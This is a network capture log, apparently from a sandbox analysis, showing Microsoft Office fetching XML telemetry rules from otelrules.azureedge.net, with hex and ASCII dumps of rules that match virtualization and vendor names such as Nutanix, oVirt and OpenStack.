2024-12-07 11:59:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:39 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: eee9af6d-a01e-001e-1905-4849ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115939Z-r1cf579d7789trgthC1EWRkkfc00000002xg000000003bzh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:39 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.7	49777	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:39 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:39 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 32c7c32d-b01e-003e-2b01-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115939Z-r1cf579d778g2t6ghC1EWRfggs00000001n0000000003tt7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:39 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.7	49779	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:39 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:39 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 7b814a2b-101e-0017-4003-4847c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115939Z-r1cf579d778d5zkmhC1EWRk6h800000002tg000000001ebd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:39 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.7	49780	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:39 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:39 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 45682ef5-801e-0048-7703-48f3fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115939Z-r1cf579d778lntp7hC1EWR9gg400000001r0000000002wa5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:39 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.7	49781	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:39 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:39 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: a7f5343d-701e-001e-5304-48f5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115939Z-r1cf579d778dndrdhC1EWR4b24000000022000000000020d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:39 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.7	49783	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:41 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:41 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 7407b41f-701e-0098-7b04-48395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115941Z-r1cf579d778mvsklhC1EWRkavg00000002mg000000001593 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:41 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.7	49784	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:41 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:41 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 49c2372f-d01e-0065-7b09-48b77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115941Z-r1cf579d778t6txphC1EWRsd4400000002q00000000044c1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:41 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.7	49785	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:41 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:41 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 704c87bc-501e-00a0-2501-489d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115941Z-r1cf579d778t5c2lhC1EWRce3w0000000320000000000en4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:41 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.7	49786	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:41 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:41 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: a75b6259-601e-0084-3701-486b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115941Z-r1cf579d7784wpmvhC1EWRk4cn00000001ng000000003x84 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:41 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.7	49787	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:41 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:42 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:42 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 90ee9adf-001e-0014-3106-485151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115942Z-r1cf579d778d5zkmhC1EWRk6h800000002q0000000003qa8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:42 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.7	49791	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:43 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:43 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: e27c4e9c-301e-0099-680b-486683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115943Z-r1cf579d778qgtz2hC1EWRmgks0000000200000000004hk6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:43 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.7	49789	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:43 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:43 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 1f654f05-501e-008f-5009-489054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115943Z-r1cf579d778xr2r4hC1EWRqvfs00000002b00000000020pa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:43 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
